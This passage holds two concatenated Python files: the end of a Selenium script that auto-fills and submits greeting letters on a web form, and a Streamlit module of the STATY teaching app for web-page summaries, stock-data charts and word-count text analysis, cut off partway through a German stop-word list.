sending_url = driver.get(mdcu_url)
receiver = mdcu_list[i]
now = datetime.datetime.now().astimezone().strftime("%Y-%m-%d %H:%M:%S UTC%Z")
with open(greeting_file_path, 'r') as greeting_file:
greeting_txt = f"{greeting_file.read()}".format(**locals()).strip()
time.sleep(2)
receiver_fill = driver.find_element_by_xpath('/html/body/div/div[2]/form/div[2]/div/div[2]/div[1]/div/div/div[2]/div/div[1]/div/div[1]/input')
receiver_fill.send_keys(receiver)
sender_fill = driver.find_element_by_xpath('/html/body/div/div[2]/form/div[2]/div/div[2]/div[2]/div/div/div[2]/div/div[1]/div/div[1]/input')
sender_fill.send_keys(sender_txt)
greeting_fill = driver.find_element_by_xpath('/html/body/div/div[2]/form/div[2]/div/div[2]/div[3]/div/div/div[2]/div/div[1]/div[2]/textarea')
greeting_fill.send_keys(greeting_txt)
if (in_production):
submit = driver.find_element_by_xpath('/html/body/div/div[2]/form/div[2]/div/div[3]/div[1]/div/div/span')
submit.click()
time.sleep(2)
driver.close()
print(f"({i+1}/{num_letters}) Letter to {receiver} is sent!")
print("*********************")
print("ALL LETTERS ARE SENT!")
print("*********************")
return
if __name__ == "__main__" :
automate_sender(in_production=True)
|
####################
# IMPORT LIBRARIES #
####################
import streamlit as st
import pandas as pd
import numpy as np
import plotly as dd
import plotly.express as px
import seaborn as sns
import matplotlib.pyplot as plt
import matplotlib.font_manager
import plotly.graph_objects as go
import functions as fc
import modelling as ml
import os
import altair as alt
import bs4
import requests
from collections import Counter
import streamlit.components.v1 as components
import yfinance as yf
import datetime
from wordcloud import WordCloud, STOPWORDS, ImageColorGenerator
from streamlit import caching
import SessionState
import sys
import platform
import re
import base64
from io import BytesIO
from pysummarization.nlpbase.auto_abstractor import AutoAbstractor
from pysummarization.tokenizabledoc.simple_tokenizer import SimpleTokenizer
from pysummarization.web_scraping import WebScraping
from pysummarization.abstractabledoc.std_abstractor import StdAbstractor
from pysummarization.abstractabledoc.top_n_rank_abstractor import TopNRankAbstractor
from sklearn.feature_extraction.text import CountVectorizer
from difflib import SequenceMatcher
#----------------------------------------------------------------------------------------------
def app():
# Clear cache
caching.clear_cache()
# Hide traceback in error messages (comment out for de-bugging)
sys.tracebacklimit = 0
#------------------------------------------------------------------------------------------
# SETTINGS
settings_expander=st.sidebar.beta_expander('Settings')
with settings_expander:
st.caption("**Precision**")
user_precision=st.number_input('Number of digits after the decimal point',min_value=0,max_value=10,step=1,value=4)
#st.caption("**Help**")
#sett_hints = st.checkbox('Show learning hints', value=False)
st.caption("**Appearance**")
sett_wide_mode = st.checkbox('Wide mode', value=False)
sett_theme = st.selectbox('Theme', ["Light", "Dark"])
#sett_info = st.checkbox('Show methods info', value=False)
#sett_prec = st.number_input('Set the number of diggits for the output', min_value=0, max_value=8, value=2)
st.sidebar.markdown("")
st.sidebar.markdown("")
# Check if wide mode
if sett_wide_mode:
fc.wide_mode_func()
# Check theme
if sett_theme == "Dark":
fc.theme_func_dark()
if sett_theme == "Light":
fc.theme_func_light()
fc.theme_func_dl_button()
#++++++++++++++++++++++++++++++++++++++++++++
# RESET INPUT
#st.sidebar.subheader("Reset")
reset_clicked = st.sidebar.button("Reset all your input")
session_state = SessionState.get(id = 0)
if reset_clicked:
session_state.id = session_state.id + 1
st.sidebar.markdown("")
#++++++++++++++++++++++++++++++++++++++++++++
# Text Mining
#++++++++++++++++++++++++++++++++++++++++++++
basic_text="Let STATY do text/web processing for you and start exploring your data stories right below... "
st.header('**Web scraping and text data**')
tw_meth = ['Text analysis','Web-Page summary','Stock data analysis']
tw_classifier = st.selectbox('What analysis would you like to perform?', list('-')+tw_meth, key = session_state.id)
if tw_classifier in tw_meth:
st.write("")
st.write("")
st.header('**'+tw_classifier+'**')
st.markdown(basic_text)
if tw_classifier=='Web-Page summary':
user_path = st.text_input("What what web page should I summarize in five sentences for you?","https://en.wikipedia.org/wiki/Data_mining")
run_models = st.button("Press to start the data processing...")
if run_models:
# Pysummarization of a web page:
def pysumMain(url):
web_scrape = WebScraping()
# Web-scraping:
document = web_scrape.scrape(url)
auto_abstractor = AutoAbstractor()
auto_abstractor.tokenizable_doc = SimpleTokenizer()
# Set delimiter for a sentence:
auto_abstractor.delimiter_list = [".", "\n"]
abstractable_doc = TopNRankAbstractor()
# Summarize a document:
result_dict = auto_abstractor.summarize(document, abstractable_doc)
# Set the limit for the number of output sentences:
limit = 5
i = 1
for sentence in result_dict["summarize_result"]:
st.write(sentence)
if i >= limit:
break
i += 1
#user_path = st.text_input("What what web page should I summarize in five sentences for you?","https://en.wikipedia.org/wiki/Data_mining")
if user_path !='':
a1, a2 = st.beta_columns(2)
with a1:
st.subheader('Web page preview:')
st.text("")
components.iframe(user_path,width=None,height=500,scrolling=True)
with a2:
st.subheader('Web page summary:')
st.text("")
pysumMain(user_path)
if tw_classifier =='Stock data analysis':
# dwonload first the list of comanies in the S&P500 and DAX indices
payload=pd.read_html('https://en.wikipedia.org/wiki/List_of_S%26P_500_companies')
first_table = payload[0]
df = first_table
symbols = df['Symbol'].values.tolist()
company = df['Security'].values.tolist()
sector = df['GICS Sector'].values.tolist()
#sectors = set(sectors)
payload1=pd.read_html('https://en.wikipedia.org/wiki/DAX')
DAXtable = payload1[3]
df=DAXtable
DAXsymbols = df['Ticker symbol'].values.tolist()
DAXSector = df['Prime Standard Sector'].values.tolist()
DAXcompany= df['Company'].values.tolist()
#Merge indices data
symbols_all=symbols+DAXsymbols
sector_all=sector+DAXSector
company_all=company+DAXcompany
#ticker specification
st.subheader('Stock data analysis')
a3, a4 = st.beta_columns(2)
with a3:
selected_stock = st.text_input("Enter a stock ticker symbol", "TSLA")
symbols_all=list('-')+symbols_all
selected_symbol = st.selectbox('You can add an additional stock for comparision...',symbols_all)
with a4:
today = datetime.date.today()
last_year = today - datetime.timedelta(days=365)
start_date = st.date_input('Select start date', last_year)
end_date = st.date_input('Select end date', today)
if start_date > end_date:
st.error('ERROR: End date must fall after start date.')
st.write("")
add_data_show=st.checkbox("Get additional data (cashflow, balance sheet etc.)", value = False)
st.write("")
dev_expander_perf = st.beta_expander("Stock performance")
with dev_expander_perf:
#get data for a selected ticker symbol:
stock_data = yf.Ticker(selected_stock)
stock_df = stock_data.history(period='1d', start=start_date, end=end_date)
add_stock_data = yf.Ticker(selected_symbol)
add_stock_df = add_stock_data.history(period='1d', start=start_date, end=end_date)
#print stock values
if st.checkbox("Show stock data for " + selected_stock, value = True):
st.write(stock_df)
if selected_symbol !="-":
if st.checkbox("Show stock data for " + selected_symbol, value = False):
st.write(add_stock_df)
comparision_check=st.checkbox('Compare '+ selected_stock + " & " + selected_symbol, value = True)
#draw line chart with stock prices
a5, a6 = st.beta_columns(2)
with a5:
stock_para= st.selectbox('Select ' + selected_stock + " info to draw", stock_df.columns)
if selected_symbol !="-":
if comparision_check:
st.subheader('Daily data comparision '+ selected_stock + " & " + selected_symbol)
c1=selected_stock + " " + stock_para
c2=selected_symbol + " " + stock_para
c1_data=stock_df[[stock_para]]
c1_data.rename(columns={c1_data.columns[0]: c1 }, inplace = True)
c2_data=add_stock_df[[stock_para]]
c2_data.rename(columns={c2_data.columns[0]: c2 }, inplace = True)
stock_dataToplot=pd.concat([c1_data, c2_data], axis=1)
#st.write(stock_dataToplot)
st.line_chart(stock_dataToplot)
else:
st.subheader(stock_para + " price for " + selected_stock + " (daily)")
stock_dataToplot=stock_df[stock_para]
st.line_chart(stock_dataToplot)
else:
st.subheader(stock_para + " price for " + selected_stock + " (daily)")
stock_dataToplot=stock_df[stock_para]
st.line_chart(stock_dataToplot)
with a6:
stock_para2= st.selectbox('Select ' + selected_stock + " info to draw", stock_df.columns, index=3)
if selected_symbol !="-":
if comparision_check:
st.subheader('Daily data comparision '+ selected_stock + " & " + selected_symbol)
c3=selected_stock + " " + stock_para2
c4=selected_symbol + " " + stock_para2
c3_data=stock_df[[stock_para2]]
c3_data.rename(columns={c3_data.columns[0]: c3 }, inplace = True)
c4_data=add_stock_df[[stock_para2]]
c4_data.rename(columns={c4_data.columns[0]: c4 }, inplace = True)
stock_dataToplot2=pd.concat([c3_data, c4_data], axis=1)
#st.write(stock_dataToplot)
st.line_chart(stock_dataToplot2)
else:
st.subheader(stock_para2 + " price for " + selected_stock + " (daily)")
stock_dataToplot2=stock_df[stock_para2]
st.line_chart(stock_dataToplot2)
else:
st.subheader(stock_para2 + " price for " + selected_stock + " (daily)")
stock_dataToplot2=stock_df[stock_para2]
st.line_chart(stock_dataToplot2)
if add_data_show:
dev_expander_cf = st.beta_expander("Cashflow")
with dev_expander_cf:
st.subheader(selected_stock)
stock_data_cf = yf.Ticker(selected_stock).cashflow
st.write(stock_data_cf)
if selected_symbol !='-':
st.subheader(selected_symbol)
st.write(yf.Ticker(selected_symbol).cashflow)
dev_expander_bs = st.beta_expander("Balance sheet")
with dev_expander_bs:
st.subheader(selected_stock)
stock_data = yf.Ticker(selected_stock)
stock_data_fi = stock_data.balance_sheet
st.write(stock_data_fi)
if selected_symbol !='-':
st.subheader(selected_symbol)
st.write(yf.Ticker(selected_symbol).balance_sheet)
dev_expander_fi = st.beta_expander("Other financials")
with dev_expander_fi:
st.subheader(selected_stock)
stock_data = yf.Ticker(selected_stock)
stock_data_fi = stock_data.financials
st.write(stock_data_fi)
if selected_symbol !='-':
st.subheader(selected_symbol)
st.write(yf.Ticker(selected_symbol).financials)
dev_expander_info = st.beta_expander("Stock basic info")
with dev_expander_info:
st.subheader(selected_stock)
stock_data = yf.Ticker(selected_stock)
st.write(stock_data.info ['longBusinessSummary'])
if selected_symbol !='-':
st.subheader(selected_symbol)
st.write(yf.Ticker(selected_symbol).info ['longBusinessSummary'])
if tw_classifier=='Text analysis':
run_text_OK=False
text_cv = CountVectorizer()
user_color=21
def random_color_func(user_col,word=None, font_size=None, position=None, orientation=None, font_path=None, random_state=None):
h = int(user_color)
s = int(100.0 * 255.0 / 255.0)
l = int(100.0 * float(random_state.randint(60, 120)) / 255.0)
return "hsl({}, {}%, {}%)".format(h, s, l)
#specify the data source
word_sl=st.radio('Select the data source for text analysis',['text input','web page'])
if word_sl=='text input':
user_text=st.text_area('Please enter or copy your text here', value='STATY \n\n STATY is growing out of the effort to bring more data insights to university education across all disciplines of the natural and social sciences. It is motivated by the belief that fostering data literacy, creativity and critical thinking are more effective towards innovation, than bringing endless units of introduction to programming to students who find learning programming an overwhelming task. By providing easy access to the methods of classical statistics and machine learning, STATY’s approach is to inspire students to explore issues they are studying in the curriculum directly on real data, practice interpreting the results and check the source code to see how it is done or to improve the code. STATY can be used in the process of teaching and learning data science, demonstrations of theoretical concepts across various disciplines, active learning, promotion of teamwork, research and beyond.', height=600, key = session_state.id )
st.write("")
if len(user_text)>0:
run_text_OK = True
elif word_sl=='web page':
user_path_wp = st.text_input("What web page should I analyse?","https://en.wikipedia.org/wiki/Data_mining", key = session_state.id)
st.write("")
if user_path_wp !='':
web_scrape = WebScraping()
user_text = web_scrape.scrape(user_path_wp)
run_text_OK = True
if run_text_OK == True:
# Basic text processing:
text_cv_fit=text_cv.fit_transform([user_text])
wordcount= pd.DataFrame(text_cv_fit.toarray().sum(axis=0), index=text_cv.get_feature_names(),columns=["Word count"])
word_sorted=wordcount.sort_values(by=["Word count"], ascending=False)
#Stop words handling:
stopword_selection=st.selectbox("Select stop word option",["No stop words (use all words)","Manually select stop words", "Use a built-in list of stop words in German", "Use a built-in list of stop words in English", "Specify stop words"], index=3, key=session_state.id)
if stopword_selection=="No stop words (use all words)":
word_stopwords=[]
elif stopword_selection=="Manually select stop words":
word_stopwords=st.multiselect("Select stop words (words to be removed from the text)", word_sorted.index.tolist(),word_sorted.index[1:min(10,len(word_sorted.index))].tolist(), key = session_state.id)
elif stopword_selection=="Use a built-in list of stop words in German":
word_stopwords=["a","ab","aber","abermaliges","abermals","abgerufen","abgerufene","abgerufener","abgerufenes","abgesehen","ach","acht","achte","achten","achter","achtes","aehnlich","aehnliche","aehnlichem","aehnlichen","aehnlicher","aehnliches","aehnlichste","aehnlichstem","aehnlichsten","aehnlichster","aehnlichstes","aeusserst","aeusserste","aeusserstem","aeussersten","aeusserster","aeusserstes","ag","ähnlich","ähnliche","ähnlichem","ähnlichen","ähnlicher","ähnliches","ähnlichst","ähnlichste","ähnlichstem","ähnlichsten","ähnlichster","ähnlichstes","alle","allein","alleine","allem","allemal","allen","allenfalls","allenthalben","aller","allerdings","allerlei","alles","allesamt","allg","allg.","allgemein","allgemeine","allgemeinem","allgemeinen","allgemeiner","allgemeines","allgemeinste","allgemeinstem","allgemeinsten","allgemeinster","allgemeinstes","allmählich","allzeit","allzu","als","alsbald","also","am","an","and","andauernd","andauernde","andauerndem","andauernden","andauernder","andauerndes","ander","andere","anderem","anderen","anderenfalls","anderer","andererseits","anderes","anderm","andern","andernfalls","anderr","anders","anderst","anderweitig","anderweitige","anderweitigem","anderweitigen","anderweitiger","anderweitiges","anerkannt","anerkannte","anerkannter","anerkanntes","anfangen","anfing","angefangen","angesetze","angesetzt","angesetzten","angesetzter","ans","anscheinend","ansetzen","ansonst","ansonsten","anstatt","anstelle","arbeiten","au","auch","auf","aufgehört","aufgrund","aufhören","aufhörte","aufzusuchen","augenscheinlich","augenscheinliche","augenscheinlichem","augenscheinlichen","augenscheinlicher","augenscheinliches","augenscheinlichst","augenscheinlichste","augenscheinlichstem","augenscheinlichsten","augenscheinlichster","augenscheinlichstes","aus","ausdrücken","ausdrücklich","ausdrückliche","ausdrücklichem","ausdrücklichen","ausdrücklicher","ausdrückliches","ausdrückt","ausdrückte","ausgenommen","ausgenommene","ausgenommenem","ausgenommenen","ausgenommener","ausgenommenes","ausgerechnet","ausgerechnete","ausgerechnetem","ausgerechneten","ausgerechneter","ausgerechnetes","ausnahmslos","ausnahmslose","ausnahmslosem","ausnahmslosen","ausnahmsloser","ausnahmsloses","außen","außer","ausser","außerdem","ausserdem","außerhalb","äusserst","äusserste","äusserstem","äussersten","äusserster","äusserstes","author","autor","b","baelde","bald","bälde","bearbeite","bearbeiten","bearbeitete","bearbeiteten","bedarf","bedürfen","bedurfte","been","befahl","befiehlt","befiehlte","befohlene","befohlens","befragen","befragte","befragten","befragter","begann","beginnen","begonnen","behalten","behielt","bei","beide","beidem","beiden","beider","beiderlei","beides","beim","beinahe","beisammen","beispiel","beispielsweise","beitragen","beitrugen","bekannt","bekannte","bekannter","bekanntlich","bekanntliche","bekanntlichem","bekanntlichen","bekanntlicher","bekanntliches","bekennen","benutzt","bereits","berichten","berichtet","berichtete","berichteten","besonders","besser","bessere","besserem","besseren","besserer","besseres","bestehen","besteht","besten","bestenfalls","bestimmt","bestimmte","bestimmtem","bestimmten","bestimmter","bestimmtes","beträchtlich","beträchtliche","beträchtlichem","beträchtlichen","beträchtlicher","beträchtliches","betraechtlich","betraechtliche","betraechtlichem","betraechtlichen","betraechtlicher","betraechtliches","betreffend","betreffende","betreffendem","betreffenden","betreffender","betreffendes","bevor","bez","bez.","bezgl","bezgl.","bezueglich","bezüglich","bietet","bin","bis","bisher","bisherige","bisherigem","bisherigen","bisheriger","bisheriges","bislang","bisschen","bist","bitte","bleiben","bleibt","blieb","bloss","böden","boeden","brachte","brachten","brauchen","braucht","bräuchte","bringen","bsp","bsp.","bspw","bspw.","bzw","bzw.","c","ca","ca.","circa","d","d.h","da","dabei","dadurch","dafuer","dafür","dagegen","daher","dahin","dahingehend","dahingehende","dahingehendem","dahingehenden","dahingehender","dahingehendes","dahinter","damalige","damaligem","damaligen","damaliger","damaliges","damals","damit","danach","daneben","dank","danke","danken","dann","dannen","daran","darauf","daraus","darf","darfst","darin","darüber","darüberhinaus","darueber","darueberhinaus","darum","darunter","das","dasein","daselbst","daß","dass","dasselbe","Dat","davon","davor","dazu","dazwischen","dein","deine","deinem","deinen","deiner","deines","dem","dementsprechend","demgegenüber","demgegenueber","demgemaess","demgemäß","demgemäss","demnach","demselben","demzufolge","den","denen","denkbar","denkbare","denkbarem","denkbaren","denkbarer","denkbares","denn","dennoch","denselben","der","derart","derartig","derartige","derartigem","derartigen","derartiger","derem","deren","derer","derjenige","derjenigen","dermaßen","dermassen","derselbe","derselben","derzeit","derzeitig","derzeitige","derzeitigem","derzeitigen","derzeitiges","des","deshalb","desselben","dessen","dessenungeachtet","desto","desungeachtet","deswegen","dich","die","diejenige","diejenigen","dies","diese","dieselbe","dieselben","diesem","diesen","dieser","dieses","diesseitig","diesseitige","diesseitigem","diesseitigen","diesseitiger","diesseitiges","diesseits","dinge","dir","direkt","direkte","direkten","direkter","doch","doppelt","dort","dorther","dorthin","dran","drauf","drei","dreißig","drin","dritte","dritten","dritter","drittes","drüber","drueber","drum","drunter","du","duerfte","duerften","duerftest","duerftet","dunklen","durch","durchaus","durchweg","durchwegs","dürfen","dürft","durfte","dürfte","durften","dürften","durftest","dürftest","durftet","dürftet","e","eben","ebenfalls","ebenso","ect","ect.","ehe","eher","eheste","ehestem","ehesten","ehester","ehestes","ehrlich","ei","ei,","eigen","eigene","eigenem","eigenen","eigener","eigenes","eigenst","eigentlich","eigentliche","eigentlichem","eigentlichen","eigentlicher","eigentliches","ein","einander","einbaün","eine","einem","einen","einer","einerlei","einerseits","eines","einfach","einführen","einführte","einführten","eingesetzt","einig","einige","einigem","einigen","einiger","einigermaßen","einiges","einmal","einmalig","einmalige","einmaligem","einmaligen","einmaliger","einmaliges","eins","einseitig","einseitige","einseitigen","einseitiger","einst","einstmals","einzig","elf","empfunden","en","ende","endlich","entgegen","entlang","entsprechend","entsprechende","entsprechendem","entsprechenden","entsprechender","entsprechendes","entweder","er","ergänze","ergänzen","ergänzte","ergänzten","ergo","erhält","erhalten","erhielt","erhielten","erneut","ernst","eröffne","eröffnen","eröffnet","eröffnete","eröffnetes","erscheinen","erst","erste","erstem","ersten","erster","erstere","ersterem","ersteren","ersterer","ersteres","erstes","es","etc","etc.","etliche","etlichem","etlichen","etlicher","etliches","etwa","etwaige","etwas","euch","euer","eure","eurem","euren","eurer","eures","euretwegen","f","fall","falls","fand","fast","ferner","fertig","finde","finden","findest","findet","folgend","folgende","folgendem","folgenden","folgender","folgendermassen","folgendes","folglich","for","fordern","fordert","forderte","forderten","fort","fortsetzen","fortsetzt","fortsetzte","fortsetzten","fragte","frau","frei","freie","freier","freies","früher","fuer","fuers","fünf","fünfte","fünften","fünfter","fünftes","für","fürs","g","gab","gaenzlich","gaenzliche","gaenzlichem","gaenzlichen","gaenzlicher","gaenzliches","gängig","gängige","gängigen","gängiger","gängiges","ganz","ganze","ganzem","ganzen","ganzer","ganzes","gänzlich","gänzliche","gänzlichem","gänzlichen","gänzlicher","gänzliches","gar","gbr","geb","geben","geblieben","gebracht","gedurft","geehrt","geehrte","geehrten","geehrter","gefallen","gefälligst","gefällt","gefiel","gegeben","gegen","gegenüber","gegenueber","gehabt","gehalten","gehen","geht","gekannt","gekommen","gekonnt","gemacht","gemaess","gemäss","gemeinhin","gemocht","gemusst","genau","genommen","genug","gepriesener","gepriesenes","gerade","gern","gesagt","geschweige","gesehen","gestern","gestrige","getan","geteilt","geteilte","getragen","getrennt","gewesen","gewiss","gewisse","gewissem","gewissen","gewisser","gewissermaßen","gewisses","gewollt","geworden","ggf","ggf.","gib","gibt","gilt","ging","gleich","gleiche","gleichem","gleichen","gleicher","gleiches","gleichsam","gleichste","gleichstem","gleichsten","gleichster","gleichstes","gleichwohl","gleichzeitig","gleichzeitige","gleichzeitigem","gleichzeitigen","gleichzeitiger","gleichzeitiges","glücklicherweise","gluecklicherweise","gmbh","gott","gottseidank","gratulieren","gratuliert","gratulierte","groesstenteils","groß","gross","große","grosse","großen","grossen","großer","grosser","großes","grosses","grösstenteils","gruendlich","gründlich","gut","gute","guten","guter","gutes","h","hab","habe","haben","habt","haette","haeufig","haeufige","haeufigem","haeufigen","haeufiger","haeufigere","haeufigeren","haeufigerer","haeufigeres","halb","hallo","halten","hast","hat","hätt","hatte","hätte","hatten","hätten","hattest","hattet","häufig","häufige","häufigem","häufigen","häufiger","häufigere","häufigeren","häufigerer","häufigeres","heisst","hen","her","heraus","herein","herum","heute","heutige","heutigem","heutigen","heutiger","heutiges","hier","hierbei","hiermit","hiesige","hiesigem","hiesigen","hiesiger","hiesiges","hin","hindurch","hinein","hingegen","hinlanglich","hinlänglich","hinten","hintendran","hinter","hinterher","hinterm","hintern","hinunter","hoch","höchst","höchstens","http","hundert","i","ich","igitt","ihm","ihn","ihnen","ihr","ihre","ihrem","ihren","ihrer","ihres","ihretwegen","ihrige","ihrigen",
"ihriges","im","immer","immerhin","immerwaehrend","immerwaehrende","immerwaehrendem","immerwaehrenden","immerwaehrender","immerwaehrendes","immerwährend","immerwährende","immerwährendem","immerwährenden","immerwährender","immerwährendes","immerzu","important","in","indem","indessen","Inf.","info","infolge","infolgedessen","information","innen","innerhalb","innerlich","ins","insbesondere","insgeheim","insgeheime","insgeheimer","insgesamt","insgesamte","insgesamter","insofern","inzwischen","irgend","irgendein","irgendeine","irgendeinem","irgendeiner","irgendeines","irgendetwas","irgendjemand","irgendjemandem","irgendwann","irgendwas","irgendwelche","irgendwen","irgendwenn","irgendwer","irgendwie","irgendwo","irgendwohin","ist","j","ja","jaehrig","jaehrige","jaehrigem","jaehrigen","jaehriger","jaehriges","jahr","jahre","jahren","jährig","jährige","jährigem","jährigen","jähriges","je","jede","jedem","jeden","jedenfalls","jeder","jederlei","jedermann","jedermanns","jedes","jedesmal","jedoch","jeglichem","jeglichen","jeglicher","jegliches","jemals","jemand","jemandem","jemanden","jemandes","jene","jenem","jenen","jener","jenes","jenseitig","jenseitigem","jenseitiger","jenseits","jetzt","jung","junge","jungem","jungen","junger","junges","k","kaeumlich","kam","kann","kannst","kaum","käumlich","kein","keine","keinem","keinen","keiner","keinerlei","keines","keineswegs","klar","klare","klaren","klares","klein","kleine","kleinen","kleiner","kleines","koennen","koennt","koennte","koennten","koenntest","koenntet","komme","kommen","kommt","konkret","konkrete","konkreten","konkreter","konkretes","könn","können","könnt","konnte","könnte","konnten","könnten","konntest","könntest","konntet","könntet","kuenftig","kuerzlich","kuerzlichst","künftig","kurz","kürzlich","kürzlichst","l","laengst","lag","lagen","lang","lange","langsam","längst","längstens","lassen","laut","lediglich","leer","legen","legte","legten","leicht","leide","leider","lesen","letze","letzte","letzten","letztendlich","letztens","letztere","letzterem","letzterer","letzteres","letztes","letztlich","lichten","lieber","liegt","liest","links","los","m","mache","machen","machst","macht","machte","machten","mag","magst","mahn","mal","man","manch","manche","manchem","manchen","mancher","mancherlei","mancherorts","manches","manchmal","mann","margin","massgebend","massgebende","massgebendem","massgebenden","massgebender","massgebendes","massgeblich","massgebliche","massgeblichem","massgeblichen","massgeblicher","mehr","mehrere","mehrerer","mehrfach","mehrmalig","mehrmaligem","mehrmaliger","mehrmaliges","mein","meine","meinem","meinen","meiner","meines","meinetwegen","meins","meist","meiste","meisten","meistens","meistenteils","mensch","menschen","meta","mich","mindestens","mir","mit","miteinander","mitgleich","mithin","mitnichten","mittel","mittels","mittelst","mitten","mittig","mitunter","mitwohl","mochte","möchte","mochten","möchten","möchtest","moechte","moeglich","moeglichst","moeglichste","moeglichstem","moeglichsten","moeglichster","mögen","möglich","mögliche","möglichen","möglicher","möglicherweise","möglichst","möglichste","möglichstem","möglichsten","möglichster","mögt","morgen","morgige","muessen","muesst","muesste","muß","muss","müssen","mußt","musst","müßt","müsst","musste","müsste","mussten","müssten","n","na","nach","nachdem","nacher","nachher","nachhinein","nächste","nacht","naechste","naemlich","nahm","nämlich","naturgemaess","naturgemäss","natürlich","ncht","neben","nebenan","nehmen","nein","neu","neue","neuem","neuen","neuer","neuerdings","neuerlich","neuerliche","neuerlichem","neuerlicher","neuerliches","neues","neulich","neun","neunte","neunten","neunter","neuntes","nicht","nichts","nichtsdestotrotz","nichtsdestoweniger","nie","niemals","niemand","niemandem","niemanden","niemandes","nimm","nimmer","nimmt","nirgends","nirgendwo","noch","noetigenfalls","nötigenfalls","nun","nur","nutzen","nutzt","nützt","nutzung","o","ob","oben","ober","oberen","oberer","oberhalb","oberste","obersten","oberster","obgleich","obs","obschon","obwohl","oder","oefter","oefters","off","offen","offenkundig","offenkundige","offenkundigem","offenkundigen","offenkundiger","offenkundiges","offensichtlich","offensichtliche","offensichtlichem","offensichtlichen","offensichtlicher","offensichtliches","oft","öfter","öfters","oftmals","ohne","ohnedies","online","ordnung","p","paar","partout","per","persoenlich","persoenliche","persoenlichem","persoenlicher","persoenliches","persönlich","persönliche","persönlicher","persönliches","pfui","ploetzlich","ploetzliche","ploetzlichem","ploetzlicher","ploetzliches","plötzlich","plötzliche","plötzlichem","plötzlicher","plötzliches","pro","q","quasi","r","reagiere","reagieren","reagiert","reagierte","recht","rechte","rechten","rechter","rechtes","rechts","regelmäßig","reichlich","reichliche","reichlichem","reichlichen","reichlicher","restlos","restlose","restlosem","restlosen","restloser","restloses","richtig","richtiggehend","richtiggehende","richtiggehendem","richtiggehenden","richtiggehender","richtiggehendes","rief","rund","rundheraus","rundum","runter","s","sa","sache","sage","sagen","sagt","sagte","sagten","sagtest","sagtet","sah","samt","sämtliche","sang","sangen","satt","sattsam","schätzen","schätzt","schätzte","schätzten","scheinbar","scheinen","schlecht","schlechter","schlicht","schlichtweg","schließlich","schluss","schlussendlich","schnell","schon","schreibe","schreiben","schreibens","schreiber","schwerlich","schwerliche","schwerlichem","schwerlichen","schwerlicher","schwerliches","schwierig","sechs","sechste","sechsten","sechster","sechstes","sect","sehe","sehen","sehr","sehrwohl","seht","sei","seid","seien","seiest","seiet","sein","seine","seinem","seinen","seiner","seines","seit","seitdem","seite","seiten","seither","selbe","selben","selber","selbst","selbstredend","selbstredende","selbstredendem","selbstredenden","selbstredender","selbstredendes","seltsamerweise","senke","senken","senkt","senkte","senkten","setzen","setzt","setzte","setzten","sich","sicher","sicherlich","sie","sieben","siebente","siebenten","siebenter","siebentes","siebte","siehe","sieht","sind","singen","singt","so","sobald","sodaß","soeben","sofern","sofort","sog","sogar","sogleich","solang","solange","solc","solchen","solch","solche","solchem","solchen","solcher","solches","soll","sollen","sollst","sollt","sollte","sollten","solltest","solltet","somit","sondern","sonst","sonstig","sonstige","sonstigem","sonstiger","sonstwo","sooft","soviel","soweit","sowie","sowieso","sowohl","später","spielen","startet","startete","starteten","startseite","statt","stattdessen","steht","steige","steigen","steigt","stellenweise","stellenweisem","stellenweisen","stets","stieg","stiegen","such","suche","suchen","t","tag","tage","tagen","tages","tat","tät","tatsächlich","tatsächlichen","tatsächlicher","tatsächliches","tatsaechlich","tatsaechlichen","tatsaechlicher","tatsaechliches","tausend","teil","teile","teilen","teilte","teilten","tel","tief","titel","toll","total","trage","tragen","trägt","tritt","trotzdem","trug","tun","tust","tut","txt","u","übel","über","überall","überallhin","überaus","überdies","überhaupt","überll","übermorgen","üblicherweise","übrig","übrigens","ueber","ueberall","ueberallhin","ueberaus","ueberdies","ueberhaupt","uebermorgen","ueblicherweise","uebrig","uebrigens","uhr","um","ums","umso","umstaendehalber","umständehalber","unbedingt","unbedingte","unbedingter","unbedingtes","und","unerhoert","unerhoerte","unerhoertem","unerhoerten","unerhoerter","unerhoertes","unerhört","unerhörte","unerhörtem","unerhörten","unerhörter","unerhörtes","ungefähr","ungemein","ungewoehnlich","ungewoehnliche","ungewoehnlichem","ungewoehnlichen","ungewoehnlicher","ungewoehnliches","ungewöhnlich","ungewöhnliche","ungewöhnlichem","ungewöhnlichen","ungewöhnlicher","ungewöhnliches","ungleich","ungleiche","ungleichem","ungleichen","ungleicher","ungleiches","unmassgeblich","unmassgebliche","unmassgeblichem","unmassgeblichen","unmassgeblicher","unmassgebliches","unmoeglich","unmoegliche","unmoeglichem","unmoeglichen","unmoeglicher","unmoegliches","unmöglich","unmögliche","unmöglichen","unmöglicher","unnötig","uns","unsaeglich","unsaegliche","unsaeglichem","unsaeglichen","unsaeglicher","unsaegliches","unsagbar","unsagbare","unsagbarem","unsagbaren","unsagbarer","unsagbares","unsäglich","unsägliche","unsäglichem","unsäglichen","unsäglicher","unsägliches","unse","unsem","unsen","unser","unsere","unserem","unseren","unserer","unseres","unserm","unses","unsre","unsrem","unsren","unsrer","unsres","unstreitig","unstreitige","unstreitigem","unstreitigen","unstreitiger","unstreitiges","unten","unter","unterbrach","unterbrechen","untere","unterem","unteres","unterhalb","unterste","unterster","unterstes","unwichtig","unzweifelhaft","unzweifelhafte","unzweifelhaftem","unzweifelhaften","unzweifelhafter","unzweifelhaftes","usw","usw.","v","vergangen","vergangene","vergangenen","vergangener","vergangenes","vermag","vermögen","vermutlich","vermutliche","vermutlichem","vermutlichen","vermutlicher","vermutliches","veröffentlichen","veröffentlicher","veröffentlicht","veröffentlichte","veröffentlichten","veröffentlichtes","verrate","verraten","verriet","verrieten","version","versorge","versorgen","versorgt","versorgte","versorgten","versorgtes","viel","viele","vielem","vielen","vieler","vielerlei","vieles","vielleicht","vielmalig","vielmals","vier","vierte","vierten","vierter","viertes","voellig","voellige","voelligem","voelligen","voelliger","voelliges","voelligst","vollends","völlig","völlige","völligem","völligen","völliger","völliges","völligst","vollstaendig","vollstaendige","vollstaendigem","vollstaendigen","vollstaendiger","vollstaendiges","vollständig","vollständige","vollständigem","vollständigen","vollständiger","vollständiges","vom","von","vor","voran","vorbei","vorgestern","vorher","vorherig","vorherige","vorherigem","vorheriger",
